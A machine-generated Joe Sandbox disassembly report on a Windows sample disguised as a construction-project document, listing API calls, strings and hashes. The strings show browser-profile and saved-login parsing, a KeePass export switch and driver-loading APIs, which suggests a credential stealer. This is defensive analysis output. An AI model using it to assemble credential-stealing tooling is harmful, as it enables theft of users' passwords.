                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 829165378-0
                                                                                                                          • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                          • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                                          • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                          • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                          • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                                          • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                          • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                          • API String ID: 3143752011-1996832678
                                                                                                                          • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                          • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                          • API String ID: 667068680-2887671607
                                                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                          • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                          • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                          • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                          • wcscpy.MSVCRT ref: 004448B4
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040DBCD
                                                                                                                          • memset.MSVCRT ref: 0040DBE9
                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                          • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                          • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                          • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                          • memset.MSVCRT ref: 0040806A
                                                                                                                          • memset.MSVCRT ref: 0040807F
                                                                                                                          • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                          • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                          • memset.MSVCRT ref: 004081E4
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                          • String ID: logins$null
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                                                          • memset.MSVCRT ref: 00408606
                                                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                          • String ID: ---
                                                                                                                          • API String ID: 3437578500-2854292027
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                                                          • memset.MSVCRT ref: 00410892
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1010922700-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                                          • free.MSVCRT ref: 004186C7
                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                          • free.MSVCRT ref: 004186E0
                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                          • free.MSVCRT ref: 00418716
                                                                                                                          • free.MSVCRT ref: 0041872A
                                                                                                                          • free.MSVCRT ref: 00418749
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: free$FullNamePath$malloc$Version
                                                                                                                          • String ID: |A
                                                                                                                          • API String ID: 3356672799-1717621600
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp
                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                          • API String ID: 2012295524-70141382
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                          Similarity
                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1700100422-0
                                                                                                                          APIs
                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 552707033-0
                                                                                                                          APIs
